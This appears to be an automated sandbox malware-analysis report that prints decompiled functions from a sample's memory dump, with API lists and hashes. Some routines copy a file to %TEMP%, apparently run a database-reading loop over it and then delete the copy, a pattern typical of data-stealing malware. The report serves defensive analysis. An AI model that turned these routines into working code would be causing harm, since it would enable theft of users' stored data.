                                                                                                                                                                                          0x0040b3c2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                          • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                          • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                                                                                                                                          • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401934, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00401934() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x41c5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401A0A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					 *0x41c5ac = 0;
					_t3 =  *0x41c60c; // 0x0
					LocalFree(_t3);
					 *0x41c60c = 0;
					_t19 =  *0x41c5d4; // 0x41c5d4
					while(_t19 != 0x41c5d4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401234(0x41c5d4);
					E00401234(0x41c5e4);
					E00401234(0x41c610);
					_t14 =  *0x41c5cc; // 0x0
					while(_t14 != 0) {
						 *0x41c5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x41c5cc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401a11);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
					}
					_push(0x41c5b4);
					L004011DC();
					return 0;
				}
			}










                                                                                                                                                                                          0x00401935
                                                                                                                                                                                          0x0040193f
                                                                                                                                                                                          0x00401a13
                                                                                                                                                                                          0x00401945
                                                                                                                                                                                          0x00401947
                                                                                                                                                                                          0x00401948
                                                                                                                                                                                          0x0040194d
                                                                                                                                                                                          0x00401950
                                                                                                                                                                                          0x0040195a
                                                                                                                                                                                          0x0040195c
                                                                                                                                                                                          0x00401961
                                                                                                                                                                                          0x00401961
                                                                                                                                                                                          0x00401966
                                                                                                                                                                                          0x0040196d
                                                                                                                                                                                          0x00401973
                                                                                                                                                                                          0x0040197a
                                                                                                                                                                                          0x0040197f
                                                                                                                                                                                          0x00401999
                                                                                                                                                                                          0x0040198e
                                                                                                                                                                                          0x00401992
                                                                                                                                                                                          0x00401997
                                                                                                                                                                                          0x00401997
                                                                                                                                                                                          0x004019a6
                                                                                                                                                                                          0x004019b0
                                                                                                                                                                                          0x004019ba
                                                                                                                                                                                          0x004019bf
                                                                                                                                                                                          0x004019c6
                                                                                                                                                                                          0x004019ca
                                                                                                                                                                                          0x004019d1
                                                                                                                                                                                          0x004019d6
                                                                                                                                                                                          0x004019db
                                                                                                                                                                                          0x004019e1
                                                                                                                                                                                          0x004019e4
                                                                                                                                                                                          0x004019e7
                                                                                                                                                                                          0x004019f3
                                                                                                                                                                                          0x004019f5
                                                                                                                                                                                          0x004019fa
                                                                                                                                                                                          0x004019fa
                                                                                                                                                                                          0x004019ff
                                                                                                                                                                                          0x00401a04
                                                                                                                                                                                          0x00401a09
                                                                                                                                                                                          0x00401a09

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3782394904-0
                                                                                                                                                                                          • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                          • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                                                                                                          • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BB8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t189;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t153 = __ebx;
				_t188 = _t189;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t193 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t188);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00403B80( &_v28);
				_push(_t188);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t193);
				E004062D8(L"%TEMP%",  &_v60, _t193);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t193);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t190 = _t189 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x65,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t191 = _t190 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
								_t191 = _t191 + 0x10;
								E00403C98( &_v80, _t148);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t184);
					 *[fs:eax] = _t184;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}










































                                                                                                                                                                                          0x00410bb8
                                                                                                                                                                                          0x00410bb8
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bbb
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc2
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc7
                                                                                                                                                                                          0x00410bc8
                                                                                                                                                                                          0x00410bc9
                                                                                                                                                                                          0x00410bca
                                                                                                                                                                                          0x00410bcb
                                                                                                                                                                                          0x00410bce
                                                                                                                                                                                          0x00410bd4
                                                                                                                                                                                          0x00410bdb
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410be1
                                                                                                                                                                                          0x00410be4
                                                                                                                                                                                          0x00410bea
                                                                                                                                                                                          0x00410bf1
                                                                                                                                                                                          0x00410bf2
                                                                                                                                                                                          0x00410bf7
                                                                                                                                                                                          0x00410bfa
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c15
                                                                                                                                                                                          0x00410c18
                                                                                                                                                                                          0x00410c25
                                                                                                                                                                                          0x00410c30
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c42
                                                                                                                                                                                          0x00410c45
                                                                                                                                                                                          0x00410c4a
                                                                                                                                                                                          0x00410c55
                                                                                                                                                                                          0x00410c60
                                                                                                                                                                                          0x00410c6a
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c84
                                                                                                                                                                                          0x00410c8f
                                                                                                                                                                                          0x00410c9a
                                                                                                                                                                                          0x00410ca9
                                                                                                                                                                                          0x00410cc5
                                                                                                                                                                                          0x00410ccc
                                                                                                                                                                                          0x00410cce
                                                                                                                                                                                          0x00410cd1
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410ceb
                                                                                                                                                                                          0x00410cfd
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d06
                                                                                                                                                                                          0x00410d09
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d6b
                                                                                                                                                                                          0x00410d72
                                                                                                                                                                                          0x00410d75
                                                                                                                                                                                          0x00410d78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d29
                                                                                                                                                                                          0x00410d3c
                                                                                                                                                                                          0x00410d43
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00410d52
                                                                                                                                                                                          0x00410d55
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d7a
                                                                                                                                                                                          0x00410d7e
                                                                                                                                                                                          0x00410d85
                                                                                                                                                                                          0x00410d8c
                                                                                                                                                                                          0x00410d93
                                                                                                                                                                                          0x00410d98
                                                                                                                                                                                          0x00410d9b
                                                                                                                                                                                          0x00410db0
                                                                                                                                                                                          0x00410dbe
                                                                                                                                                                                          0x00410cab
                                                                                                                                                                                          0x00410cad
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410dc5
                                                                                                                                                                                          0x00410dc8
                                                                                                                                                                                          0x00410dcb
                                                                                                                                                                                          0x00410dd8
                                                                                                                                                                                          0x00410de0
                                                                                                                                                                                          0x00410de8
                                                                                                                                                                                          0x00410df0
                                                                                                                                                                                          0x00410dfd
                                                                                                                                                                                          0x00410e05
                                                                                                                                                                                          0x00410e12
                                                                                                                                                                                          0x00410e1f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-3650661790
                                                                                                                                                                                          • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                          • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410900, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				void* _t189;
				void* _t190;

				_t185 = __esi;
				_t153 = __ebx;
				_t187 = _t188;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t192 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t187);
				_push(0x410b63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E004034E4( &_v28);
				_push(_t187);
				_push(0x410ae8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t192);
				E004062D8(L"%TEMP%",  &_v60, _t192);
				_push(_v60);
				_push(0x410b9c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t192);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t189 = _t188 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x11,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t190 = _t189 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
								_t190 = _t190 + 0x10;
								E004036DC( &_v80, _t148);
								_push(_v80);
								_push(E00410BB4);
								E00403850();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403D2C(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t183);
					 *[fs:eax] = _t183;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410B6A);
				E00403508( &_v80, 3);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B80( &_v32);
				E004034E4( &_v28);
				return E00403B80( &_v8);
			}










































                                                                                                                                                                                          0x00410900
                                                                                                                                                                                          0x00410900
                                                                                                                                                                                          0x00410901
                                                                                                                                                                                          0x00410903
                                                                                                                                                                                          0x00410908
                                                                                                                                                                                          0x00410908
                                                                                                                                                                                          0x0041090a
                                                                                                                                                                                          0x0041090c
                                                                                                                                                                                          0x0041090c
                                                                                                                                                                                          0x0041090c
                                                                                                                                                                                          0x0041090f
                                                                                                                                                                                          0x00410910
                                                                                                                                                                                          0x00410911
                                                                                                                                                                                          0x00410912
                                                                                                                                                                                          0x00410913
                                                                                                                                                                                          0x00410916
                                                                                                                                                                                          0x0041091c
                                                                                                                                                                                          0x00410923
                                                                                                                                                                                          0x00410924
                                                                                                                                                                                          0x00410929
                                                                                                                                                                                          0x0041092c
                                                                                                                                                                                          0x00410932
                                                                                                                                                                                          0x00410939
                                                                                                                                                                                          0x0041093a
                                                                                                                                                                                          0x0041093f
                                                                                                                                                                                          0x00410942
                                                                                                                                                                                          0x0041094d
                                                                                                                                                                                          0x00410952
                                                                                                                                                                                          0x00410958
                                                                                                                                                                                          0x0041095d
                                                                                                                                                                                          0x00410960
                                                                                                                                                                                          0x0041096d
                                                                                                                                                                                          0x00410978
                                                                                                                                                                                          0x00410985
                                                                                                                                                                                          0x0041098a
                                                                                                                                                                                          0x0041098d
                                                                                                                                                                                          0x00410992
                                                                                                                                                                                          0x0041099d
                                                                                                                                                                                          0x004109a8
                                                                                                                                                                                          0x004109b2
                                                                                                                                                                                          0x004109c1
                                                                                                                                                                                          0x004109cc
                                                                                                                                                                                          0x004109d7
                                                                                                                                                                                          0x004109e2
                                                                                                                                                                                          0x004109f1
                                                                                                                                                                                          0x00410a0d
                                                                                                                                                                                          0x00410a14
                                                                                                                                                                                          0x00410a16
                                                                                                                                                                                          0x00410a19
                                                                                                                                                                                          0x00410a1b
                                                                                                                                                                                          0x00410a33
                                                                                                                                                                                          0x00410a45
                                                                                                                                                                                          0x00410a4c
                                                                                                                                                                                          0x00410a4e
                                                                                                                                                                                          0x00410a51
                                                                                                                                                                                          0x00410a53
                                                                                                                                                                                          0x00410aaf
                                                                                                                                                                                          0x00410ab3
                                                                                                                                                                                          0x00410aba
                                                                                                                                                                                          0x00410abd
                                                                                                                                                                                          0x00410ac0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410a60
                                                                                                                                                                                          0x00410a71
                                                                                                                                                                                          0x00410a84
                                                                                                                                                                                          0x00410a8b
                                                                                                                                                                                          0x00410a8d
                                                                                                                                                                                          0x00410a95
                                                                                                                                                                                          0x00410a9a
                                                                                                                                                                                          0x00410a9d
                                                                                                                                                                                          0x00410aaa
                                                                                                                                                                                          0x00410aaa
                                                                                                                                                                                          0x00410aaf
                                                                                                                                                                                          0x00410a53
                                                                                                                                                                                          0x00410ac2
                                                                                                                                                                                          0x00410ac6
                                                                                                                                                                                          0x00410acd
                                                                                                                                                                                          0x00410ad4
                                                                                                                                                                                          0x00410adb
                                                                                                                                                                                          0x00410ae0
                                                                                                                                                                                          0x00410ae3
                                                                                                                                                                                          0x00410af8
                                                                                                                                                                                          0x00410b06
                                                                                                                                                                                          0x004109f3
                                                                                                                                                                                          0x004109f5
                                                                                                                                                                                          0x004109f8
                                                                                                                                                                                          0x004109f8
                                                                                                                                                                                          0x00410b0d
                                                                                                                                                                                          0x00410b10
                                                                                                                                                                                          0x00410b13
                                                                                                                                                                                          0x00410b20
                                                                                                                                                                                          0x00410b28
                                                                                                                                                                                          0x00410b30
                                                                                                                                                                                          0x00410b3d
                                                                                                                                                                                          0x00410b45
                                                                                                                                                                                          0x00410b4d
                                                                                                                                                                                          0x00410b55
                                                                                                                                                                                          0x00410b62

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410945
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-3650661790
                                                                                                                                                                                          • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                          • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402AC4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00402AC4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41b018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x41b018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x41b018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402B35);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402b3c);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                                                                                          0x00402ac5
                                                                                                                                                                                          0x00402ac7
                                                                                                                                                                                          0x00402ad1
                                                                                                                                                                                          0x00402aed
                                                                                                                                                                                          0x00402b3c
                                                                                                                                                                                          0x00402b4e
                                                                                                                                                                                          0x00402b51
                                                                                                                                                                                          0x00402b5a
                                                                                                                                                                                          0x00402aef
                                                                                                                                                                                          0x00402af1
                                                                                                                                                                                          0x00402af2
                                                                                                                                                                                          0x00402af7
                                                                                                                                                                                          0x00402afa
                                                                                                                                                                                          0x00402afd
                                                                                                                                                                                          0x00402b19
                                                                                                                                                                                          0x00402b20
                                                                                                                                                                                          0x00402b23
                                                                                                                                                                                          0x00402b26
                                                                                                                                                                                          0x00402b34
                                                                                                                                                                                          0x00402b34

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                          • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                          • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416584, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char _v72;
				_Unknown_base(*)()* _t13;
				intOrPtr _t36;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __eflags;
				_v72 = 0;
				_t38 = __eax;
				 *[fs:eax] = _t41 + 0xffffffbc;
				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
